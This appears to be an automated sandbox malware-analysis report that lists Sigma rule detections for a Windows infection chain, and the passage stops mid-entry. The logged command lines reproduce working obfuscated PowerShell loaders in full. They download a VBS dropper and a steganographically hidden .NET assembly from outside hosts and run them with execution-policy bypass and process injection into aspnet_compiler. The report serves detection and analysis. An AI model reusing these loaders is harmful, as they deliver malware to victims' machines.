CAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, ProcessId: 4592, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2736, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline", ProcessId: 5104, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", CommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICA

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 